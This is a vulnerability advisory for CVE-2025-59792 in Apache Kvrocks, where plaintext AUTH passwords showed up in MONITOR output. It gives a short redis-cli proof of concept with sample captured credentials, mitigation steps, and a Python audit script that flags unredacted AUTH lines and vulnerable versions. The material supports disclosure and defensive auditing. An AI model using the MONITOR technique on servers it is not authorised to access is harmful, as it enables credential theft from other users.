Medium | CVSS 5.3 | Information Disclosure | CVE-2025-59792
Published 2025
Apache Kvrocks Credential Exposure via MONITOR
BugBunny.ai discovered that Apache Kvrocks exposed plaintext credentials through the MONITOR command. Any client able to run MONITOR could capture the arguments of every AUTH command, including the plaintext password, as other clients authenticated to the server.
TL;DR
Plaintext passwords visible in MONITOR output
Impact: Credential theft for any user authenticating to the server
Vector: MONITOR command captures AUTH arguments
Affected: Kvrocks v1.0.0 - v2.13.0
Status: Fixed in v2.14.0 - AUTH arguments now redacted in MONITOR output
Proof of Concept
# Connect as any authenticated user (or unauthenticated if no requirepass)
redis-cli -h kvrocks-host -p 6666
# Start monitoring all commands processed by server
> MONITOR
OK
# Wait for admin to authenticate or client to connect with credentials...
# Vulnerable output (v1.0.0-v2.13.0):
1706000000.000000 [0 10.0.0.5:54321] "AUTH" "SuperSecretAdminPassword123!"
1706000001.000000 [0 10.0.0.6:54322] "AUTH" "default" "AnotherUserPassword456!"
# AUTH commands with plaintext passwords visible to MONITOR!
# Any user with MONITOR access can capture credentials
# Fixed in v2.14.0: AUTH command arguments are now redacted
# 1706000000.000000 [0 10.0.0.5:54321] "AUTH" "(redacted)"
Mitigation
- Upgrade to Apache Kvrocks v2.14.0 or later, which redacts AUTH command arguments in MONITOR output
- Restrict MONITOR access to trusted administrators only; a client that can run MONITOR sees every command the server processes, not just AUTH
- Rotate any password that may have been sent while an untrusted client could have been running MONITOR against an unpatched server
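As an added example (this is not code from the original advisory or from the Kvrocks project), the following Python script turns the PoC into a repeatable audit: it parses MONITOR lines in the format shown above, flags AUTH commands whose arguments are not redacted without copying the secret into the report, and checks a version string from INFO against the v2.14.0 fix release this advisory names. The sample lines are constructed from the PoC output. The check_live_server() helper, its RESP encoding, and the assumption that Kvrocks streams MONITOR lines as RESP simple strings the way Redis does are assumptions of this example and are not exercised by the sample run.

```python
"""Audit MONITOR output for unredacted AUTH arguments.

Added example, not Apache Kvrocks project code. The offline functions work on
captured MONITOR lines; check_live_server() is an assumed helper that drives a
real server and is not run by the sample block at the bottom.
"""
import re
import socket

# MONITOR line as shown in the PoC: <unix ts> [<db> <ip:port>] "ARG" "ARG" ...
MONITOR_LINE = re.compile(
    r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<addr>[^\]]+)\] (?P<args>.*)$')
QUOTED_ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')
ESCAPES = {'n': '\n', 'r': '\r', 't': '\t', 'a': '\a', 'b': '\b',
           '\\': '\\', '"': '"'}
FIXED_VERSION = (2, 14, 0)   # release the advisory names as carrying the fix

# Constructed sample feed mirroring the PoC output (not a real capture).
SAMPLE_MONITOR = [
    '1706000000.000000 [0 10.0.0.5:54321] "AUTH" "SuperSecretAdminPassword123!"',
    '1706000001.000000 [0 10.0.0.6:54322] "AUTH" "default" "AnotherUserPassword456!"',
    '1706000002.000000 [0 10.0.0.6:54322] "GET" "session:42"',
    '1706000003.000000 [0 10.0.0.7:54323] "AUTH" "(redacted)"',   # patched server
    'OK',                                                           # reply, not a command
]


def _unescape(arg):
    # Undo MONITOR's backslash escaping: \n, \", \\ and \xHH for non-printables.
    def sub(m):
        esc = m.group(1)
        return chr(int(esc[1:], 16)) if esc.startswith('x') else ESCAPES.get(esc, esc)
    return re.sub(r'\\(x[0-9a-fA-F]{2}|.)', sub, arg)


def parse_monitor_line(line):
    """Return {'ts', 'db', 'addr', 'args'} or None if this is not a MONITOR line."""
    m = MONITOR_LINE.match(line.strip())
    if not m:
        return None
    return {'ts': float(m['ts']), 'db': int(m['db']), 'addr': m['addr'],
            'args': [_unescape(a) for a in QUOTED_ARG.findall(m['args'])]}


def find_exposed_auth(lines):
    """Flag AUTH commands whose secret is visible. Only the password length is
    recorded, so the audit report is not itself a second copy of the leak."""
    findings = []
    for line in lines:
        rec = parse_monitor_line(line)
        if not rec or not rec['args'] or rec['args'][0].upper() != 'AUTH':
            continue
        secrets = rec['args'][1:]
        if not secrets or secrets == ['(redacted)']:
            continue   # patched server, or a bare AUTH with no argument
        # "AUTH <password>" is the one-argument form, "AUTH <user> <password>" the two-argument form
        user = secrets[0] if len(secrets) == 2 else None
        findings.append({'ts': rec['ts'], 'client': rec['addr'], 'user': user,
                         'password_len': len(secrets[-1])})
    return findings


def parse_version(info_text):
    """Extract (major, minor, patch) from INFO output such as 'kvrocks_version:2.13.0'."""
    m = re.search(r'^(?:kvrocks|redis)_version:(\d+)\.(\d+)\.(\d+)', info_text, re.M)
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable_version(version):
    """True when the reported version is known and older than the fix release."""
    return version is not None and version < FIXED_VERSION


def _resp(*args):
    """Encode a command as a RESP array, the wire format redis-cli speaks."""
    payload = [b'*%d\r\n' % len(args)]
    for a in args:
        b = a.encode()
        payload.append(b'$%d\r\n%s\r\n' % (len(b), b))
    return b''.join(payload)


def check_live_server(host, port=6666, password=None, watch_seconds=30):
    """Assumed helper: run MONITOR for watch_seconds and audit what it streams
    (assumes '+'-prefixed RESP simple strings). Only use with authorisation."""
    with socket.create_connection((host, port), timeout=5) as s:
        reader = s.makefile('rb')
        if password:
            s.sendall(_resp('AUTH', password))
            if not reader.readline().startswith(b'+OK'):
                raise RuntimeError('AUTH rejected')
        s.sendall(_resp('MONITOR'))
        if not reader.readline().startswith(b'+OK'):
            raise RuntimeError('MONITOR rejected')
        s.settimeout(watch_seconds)
        lines = []
        try:
            for raw in reader:
                lines.append(raw.decode(errors='replace').lstrip('+'))
        except socket.timeout:
            pass   # watch window elapsed
    return find_exposed_auth(lines)


if __name__ == '__main__':
    for finding in find_exposed_auth(SAMPLE_MONITOR):
        print(finding)
    print('vulnerable:', is_vulnerable_version(parse_version('kvrocks_version:2.13.0')))
```

Run it as-is to audit the constructed sample, or feed `find_exposed_auth()` the lines of a saved `redis-cli MONITOR` transcript. The report deliberately records only the client address, the user (when the two-argument form was used) and the password length, so an audit log does not reproduce the exposure it is documenting.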
Credits & Disclosure
Identified by BugBunny.ai and responsibly disclosed to the Apache Kvrocks maintainers.
Reporter: BugBunny.ai